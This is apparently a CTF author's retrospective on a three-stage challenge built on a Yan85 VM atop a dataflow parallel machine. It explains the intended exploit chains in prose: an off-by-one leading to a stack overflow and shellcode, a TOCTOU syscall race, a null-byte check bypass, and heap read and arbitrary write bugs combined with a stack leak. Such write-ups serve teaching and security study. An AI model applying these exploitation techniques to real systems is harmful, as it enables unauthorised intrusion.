This challenge is an implementation of the pwn.college "Yan85" vm written on top of the Manchester parallel machine.
Authors: adamd and Zardus (even though Zardus wrote zero lines of code he insipred this challenge and acted as my rubber ducky constantly during development, so in true academic spirit he should get credit as well, but none of the blame).
One idea for this challenge is that honestly I was bummed that teams didn't really get to the depth of the parallel-af challenge, which had four bugs in phase 2 and a trap mode that was never used. I felt that the teams really didn't understand the true nature and cool-ness of the parallel machine, and the bugs that I had did not exploit anything specific to the parallel machine architecure.
After chatting with Zardus, the core concept of the challenge solidifed: the "Yan85" vm was a VM very similar to x86 expect for one crucial difference: because instruction opcodes and operands were single-bit you can have instructions that have multiple opcodes (i.e. one instruction that does add, load from memory, and a syscall). We hypothesized that a Yan85-style VM on a parallel machine could have race conditions in multiple-opcode instructions due to the inherent non-determinism of the parallel machine (there is no concept of a program counter in a dataflow machine because instructions execute when the data is ready), and this was the core inspiration of the challenge.
Changed a decent amount in the program, but the main new components are:
-
arrays.c implementation of a new module in the parallel machine for arrays. This was a major pain in the original parallel-af challenge because all data in the machine needed to be 8 bytes max, and it's very hard to do a VM like that. Designed the instructions inspired by Lisp
aref
operations. -
vm.force the implementation of the Yan85 VM in the force language.
-
vm-assembler.py a Yan85 VM assembler.
-
p aka vuln.vm is a "simple" menu-based log system. Due to the constraints of Yan85 machine, programming this is a major PITA (e.g., only computation instruction is
add
), so I took a lot of shortcuts such as my implementation ofprint_int
which only works for 0 through 10 (but at least it's documentated?).
There were three stages to this challenge baby
, mama
, and gran
,
with the differences between the two being a 4 byte difference in
checks of the same name
(the string "mama" was changed to "flag" in vm
for stage 2
and the string "gran" was changed to "flag" in manchester
for stage 3).
The idea was that checks to ensure that the teams could not open the
flag
file were added at the vm
and then in the parallel machine
itself (and the goal was to bypass those).
The goal of stage 1 was for teams to understand the Yan85 vm, identify a vulnerability, and write Yan85 shellcode.
The intended path for baby
was an off-by-one error where logs are stored in p
.
This allows you to change the max_num_logs
variable so that you can start writing more log entries.
You can create one more log entry and overwrite the name_len
variable, which is used when deciding how many bytes to read onto the stack for the name
of the logs.
This way, the next log entry will overflow the saved IP on the stack and redirect control to your Yan85 shellcode.
My shellcode for this vulnerability writes "flag" onto the stack (so that it's not dependant on the memory layout of the machine), calls open, then reads the flag and writes it out.
Another approach that I know of that teams used to solve this stage
was to overwrite the max_num_logs
then keep creating logs until you
reached the stack. I think the next stages were not possible with this
approach due to the slowness (deployment had a hard 5 minute timeout).
To goal of stage 2 was for teams to understand the race conditions due
to non-determinism in the parallel machine, and use that race
condition to exploit a
TOCTOU
vulnerability in
the check in the vm
of "flag".
While every instruction interpretation
happened sequentially, there is no data dependency between
the OPEN
syscall and
READ
syscall, so a Yan85 VM
instruction of sys OPEN|READ d
would be nondeterministic and roughly
~2% of the time a READ
from stdin into the same buffer as the OPEN
would hit in the middle of the TOCTOU. To get this working I had to
experimentally add and remove instructions
(hence the checks for only some files)
My YanVM code exploit
for this stage created the string "alag" in memory and
called a concurrent OPEN
and READ
syscall,
and after would check if it could read a known FD.
My python exploit would then send a bunch of "f"s which would be used to win the race and overwrite "alag" into "flag" and bypass the check.
Oh, I also had to write a stage 0 shellcode which would read in the race shellcode because the race shellcode was too big to put on the stack.
Unfortunately, there was an unintended shortcut solution because
the equality check for "flag" in the
underlying parallel machine operated on 8 bytes, and equality
comparison compared all 8 bytes while the
underlying parallel machine OPN
instruction
used C-strings (null byte delimited) to read the flag.
Therefore, if you tried to OPEN
a file from the Yan85 vm with
flag\x00a
it would bypass the check and read the flag
:crying_face_emoji:
.
I implemented the missing check but did
not deploy (discussed later), but this check increases the success
rate of the race to ~75%.
The goal of stage 3 was for the teams to exploit manchester
using bugs in the array module.
First they had to
win another data race in the OPEN
syscall
which should make it impossible to open a file up for writing (the VM
zeros out the writing bytes if it detects them). If teams used the
shortcut solution for stage 2 they would have no idea how to proceed
from here.
The quit
file is the only writable file in the whole directory (and
path traversal
should be impossible due to a check),
and the only modification to sh
was to first call vm p
then
call quit
.
If you send up a Yan85 sys OPEN|READ
syscall to try and open quit
and point the flags to the same memory location as quit
, it will try
to open the file puit
(due to the flag check) in read mode. However,
by using the idea of a data race and sending a q
as input, if you
win the race you will be able to open quit
for writing
.
Now, you can write a parallel machine program!
The next part takes advantage of two vulnerabilities in the array module (heap read and arbitrary write) and a data leak in the queue module.
The
ARF
instruction has a signed/unsigned vulnerability that allows heap memory read
which allows an attack from a parallel machine program to read data on
the heap from a negative location from a new array.
The
AST
instruction has an arbitrary write vulnerability
because even though it is checking that the given point is in the
known array bounds the check is incorrect.
I'm not a heap expert, so I wasn't sure that using only these two
primitives if you could achieve code execution (you cannot trigger any
free
s). Plus, the seccomp filters for
the array module would mean that you couldn't read the flag anyway
(we'll see how to get around that).
So, there was a bug in the queue module where the queue struct that was created on the stack was copied onto the heap and would leak a stack address onto the heap.
At this point you can leak the stack address from the heap, then use the arbitrary write to write values on to the stack. But what to write? The array module executes as a giant while loop, so I don't think you can overwrite saved rip on the stack.
My solution was to target the currently processing execution_packet
on the stack, specifically
to set the ring
to zero, opcode
to OPN
, and data_1
to flag
,
which would bypass the
stage 3 check in the input module.
(In full honesty, my original plan was to keep the opcodes and structs
of the parallel machine the same, but since I had to change the
queue
struct and the execution_packet
struct to accomplish this I
decided to modify all the rest of the machine so it wasn't obvious.)
This resulted in
a parallel machine program
that would first leak out the value from the heap, then
call an AST
instruction
that would actually transform itself into an OPN flag
in ring 0
instruction.
Putting this all together into an exploit.py essentially first exploits stage 1 vulnerability to execute the shellcode loaded.
Then it sends
Yan85 shellcode to first win the data race to open q
for writing, then reads in the quit
parallel program.
This exploit works 1/16 times because the last byte of the stack
leakage is overwritten by the struct ring
field. Since the parallel
machine is Turing complete I'm sure a sufficiently smart human could
write a deterministic exploit.
From a development perspective, nothing helped more than
creating an emacs mode for the force
language.
I didn't do this for Yan85 and it was a massive pain.
Long story short, my parallel machine compiler and assembler were
non-deterministic because I was using Python set
s and
defaultdict
s, and this would affect the generated code. This caused
hair-pullingly difficult problems where I would test the data race,
make a change to make it easier to win, and it would somehow be
harder. Note to self: always ensure your compiler is deterministic
(and PYTHONHASHSEED=0
is your friend).
The stage 2 shortcut solution was very frustrating. Of course I tested my stage 1 solution against stage 2 (it did not work), and I even tested the first stage 1 solution from the teams against the unreleased stage 2 (it also did not work). So we released stage 2, but teams were exploiting it much quicker than I expected.
After digging in (while very sleep deprived), I realized what the bug was and we were faced with a few choices:
-
Deploy a new fixed version of
mama
(stage 2) with the fix. Not really an option b/c with 3 stages this whole challenge direction is worth a lot of points already, and adding another is probably too much. -
Redeploy the fixed version of
mama
and take the flags away from people that already solved it. This isn't something that we've really done before, and by this point 3 or 4 teams had already solved it. They might have redirected people away from the problem once it was solved. Another risk is that the additional check changes the race condition and made it way easier (which would have required significant tweaking on my part, which is very risky to do with sleep deprivation). We decided against this option (although I still wonder if this would have been better). -
Do nothing. We reasoned that this shortcut solution of stage 2 would get them no closer to stage 3 (since they have no idea about the data race), so in this way stage 3 would sort of make up the difference. Ultimately this is what we decided to do.
-
Release a fixed version of
mama
as a hint for stage 3, saying that if you solved the fixed version ofmama
then you were on the way to the first part of stage 3. I explored this option (creating the fix and ensuring that it was solvable), and polled the teams that were the first to solve stage 1 and stage 2. When I realized that they found the data race we abandoned this idea.
Still not sure what the right approach was here, but at least now you understand what happened and our reasoning.
I did development and exploitation of the challenge on a remote machine. Then, I built the challenge for deployment on my laptop and pushed to infra. All should be fine I thought, the teams have complete knowledge of the challenge: the exact Dockerfile and binaries, everything to run the challenge exactly as it's running in the infra. I even had the thought "I should probably give them the libc so", then I thought what's the point they have full knowledge.
Unfortunately I didn't realize that my laptop's docker was using an
old cached version of ubuntu:18.04
and the deployed libc
version
was ~1 year old. This caused unexpected and unintended hardship for
teams that were very close to exploiting stage 3, and I'm sorry for
that.
One of the things that drew me to this challenge is that parallel machines represent a fundamentally different model of computation (a computer architecture without a program counter and the finest grain parallelism possible.) And teams in 2020 finals barely scratched the surface of this cool concept.
Of course, teams that played DEFCON CTF 2020 finals would have an advantage on such a challenge due to familiarity with the concept and hands-on experience (although of all 16 teams PPP was the one that had the best command of the parallel machine IIRC).
We discussed it internally and decided that the following factors were
in play: (1) the parallel-af
machine was open-source since finals,
(2) I discussed the ideas and concepts of the parallel machine
publicly
(OOO CTF recaps), and
(3) the race condition style-bug was not used at all in finals that it
would be OK. We would also point people to the parallel-af source code
so that they could start from there (and have code/docs/papers to
reference).
The feedback we received was that some teams still felt that this unfairly benefited finals teams, which we know kind of agree with. One thing to note is that I've heard from several teams that they exploited stage 1 in a completely black-box way and did no real reversing of the vm (if I understand them correctly), which is pretty cool.
Hope you enjoyed the challenge, it was a joy and a pain to write, and I learned a ton. I hope you did too.
- adamd